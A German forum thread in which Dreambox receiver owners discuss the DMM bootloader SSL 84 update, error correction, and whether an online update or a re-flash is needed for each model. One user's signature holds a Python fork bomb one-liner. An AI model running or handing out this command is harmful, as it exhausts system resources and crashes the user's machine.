ja, danke nochmals für den hinweis!
Neues DMM Update mit SSL 84.r0
-
-
über webif wird aber auch der ssl erneuert.
-
Ja der Punkt ist aber das der Loader schon auf der Box sein muss wenn man ein Image über das WebInterface flasht.
Man kann den loader separat flashen und das Image dann hinterher.
Man kann ein unstable update machen und das Image dann hinterher flashen.
Man kann das Image 2x flashen.
Man kann das Image direkt mit dem neuen dreamup flashen.
Also zumindest wenn die Fehlerkorrektur funktionieren soll. -
Original von sparksofinsanity
Man kann ein unstable update machen und das Image dann hinterher flashen.
jetzt mal blöd gefragt -
würde es genügen, heute und morgen je ein update zu machen? -
Laut der Aussage von Ghost nicht.
Möchte man die Fehlerkorrektur nutzen so muss der SecondStage bereits auf der Box sein und man muss anschließend das Image neu flashen. -
hey
für 8k nutzer steht aber :
An die Nutzer der DM8000: Hier reicht einfach nur das Ausführen des Online-Updates, ein Neu-Flashen ist nicht nötig.
ists das nu richtig ?
mfg tysonDer neid der anderen kotzt mich an
-
Original von tyson
hey
für 8k nutzer steht aber :
An die Nutzer der DM8000: Hier reicht einfach nur das Ausführen des Online-Updates, ein Neu-Flashen ist nicht nötig.
ists das nu richtig ?
mfg tyson
Japython -c 'while 1: __import__("os").fork()'
Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras ! -
thx
kati910
dann its ja gut .also onlineupdate beim unstable und jut ists es .
mfg tysonDer neid der anderen kotzt mich an
-
Also ich hab eine 8000er und eine 800HDse. Die 8000er steht im Wohnzimmer, da hab ich nur stable Images laufen und brauche nur warten, bis ein neues NN²-Release rauskommt, welches ich vermutlich via Onlineupate updaten kann. Bei der 8000er brauche ich auch nicht neuflashen und es wird trotzdem der SSL 84 übertragen und auch die Error Correction wird in der 8000er richtig angzeigt
Bei meiner 800Hdse einfach via Dreamup 1.3.3.8 ein unstable von heute flashen und gut ist? habe ich das jetzt richtig verstanden? -
ja
-
was macht die neue Fehlerkorrektur besser? einfach frag
mfg -
hey
bei 8k einfach neues unstable gemacht und alles ists perfekt.
mfg tyson
super bord thx:DDer neid der anderen kotzt mich an
-
ich mach kein Update ohne nur ansatzweise zu wissen was da anschließend passiert.
bitte mehr Infos. -
Die 8k solltest du upgraden können, die hat die ecc Korrektur schon lange.
Bei den anderen Box ist das allerdings neu -> de.wikipedia.org/wiki/Fehlerko…Parit.C3.A4tspr.C3.BCfung -
danke sparky,
ich werde erst mal abwarten was von DMM noch so kommt. ich glaube da können wir in
nächster Zeit noch einiges testen. -
Hoffe habe alles auf dem neusten Stand ...Habe gestern nachmittag ein onlineupdate ( unstable) auf meiner 500Hd gemacht danach zeigte mir die Box wenn ich die Tasten zum flashen gedrückt habe an ( Bootloader #84 2011-09-01) vorher wars Bootloader #83 (2011-03-06)...
Habe dann grade das neueste unstable von heute runtergeladen und komplett neu geflasht über Browser ....alles läuft normal ....
von Telnet hab ich wirklich null Ahnung .deshalb ne kurze Frage wo kann ich sehen das alles wirklich auf dem neusten Stand ist ?
Sorry falls ich nerve,aber wie gesagt mit Telnet steh ich auf Kriegsfuss,aber da kann man bestimmt mit dem passenden Befehl sehen wie der Stand der Box ist ...aber trotzdem Danke im vorraus
Gruss BVB01 -
Ich habe es immer noch nicht richtig kapiert
Alles unstable:
1. Meine 8000er habe ich gestern abend über das Software-Menü updaten lassen, die sollte jetzt auf dem neuesten Stand sein, richtig?
2. Meine 500HD muß ich über das Software-Menü updaten, dann sollte der Bootloader #83 drauf sein.
Und jetzt?
2a. Mit einem opkg upgrade && opkg update sollte doch dann alles geladen werden?
2b. Oder muß ich das NN2-Image neu flashen (reicht über Browser oder muß DreamUp V 1.3.3.8 benutzt werden?)
3. Danach mit configsaver Einstellungen und plugins wiederherstellen.
Kann mich jemand aufklären?Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Griffel ()
-
Gibt es auch DreamUp für einen MAC oder ein alternatives Verfahren?THX
EDDIE -
zwei mal das image flashen bleibt dir nur uebrig
-
Original von oZxS
zwei mal das image flashen bleibt dir nur uebrig
meintest du mich?THX
EDDIE
-
Teilen
- Facebook 0